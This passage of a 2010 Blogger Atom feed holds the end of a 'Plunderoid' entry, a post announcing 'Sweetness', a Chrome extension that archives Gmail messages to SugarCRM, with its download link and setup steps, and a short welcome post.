src='https://blogger.googleusercontent.com/tracker/7699735801453301458-96724004536736670?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/96724004536736670/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/plunderoid.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/96724004536736670'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/96724004536736670'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/plunderoid.html' title='Plunderoid'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-3819317366932727516</id><published>2010-06-01T11:00:00.000-07:00</published><updated>2010-11-24T19:57:44.401-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='archive'/><category scheme='http://www.blogger.com/atom/ns#' term='sugarcrm'/><category scheme='http://www.blogger.com/atom/ns#' term='release'/><category scheme='http://www.blogger.com/atom/ns#' term='gmail'/><category scheme='http://www.blogger.com/atom/ns#' term='chrome'/><category scheme='http://www.blogger.com/atom/ns#' term='sweetness'/><category scheme='http://www.blogger.com/atom/ns#' term='google'/><title type='text'>Sweetness</title><content type='html'>Sweetness is a Google Chrome extension for SugarCRM to archive email from Gmail to Sugar!!&lt;br /&gt;&lt;br /&gt;Current version: 0.9.5 beta&lt;br /&gt;DOWNLOAD: &lt;a href="http://dealerweb.grandcare.com/Sweetness.crx"&gt;HERE&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;To install just open Chrome and visit http://dealerweb.grandcare.com/Sweetness.crx&lt;br /&gt;Once installed make sure you goto the options to set server address, user name and password. Thats it, a fast little download and a few second set up and your ready to start using Sweetness!&lt;br /&gt;&lt;br /&gt;For more info and to report bugs go &lt;a href="http://www.sugarforge.org/projects/sweetness/"&gt;HERE&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-3819317366932727516?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/3819317366932727516/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/sweetness.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/3819317366932727516'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/3819317366932727516'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/sweetness.html' title='Sweetness'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-1373675715928384611</id><published>2010-06-01T09:55:00.000-07:00</published><updated>2010-06-01T11:08:04.522-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='first'/><title type='text'>First</title><content type='html'>Welcome to Solution X.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-1373675715928384611?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/1373675715928384611/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/first.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/1373675715928384611'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/1373675715928384611'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/first.html' title='First'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
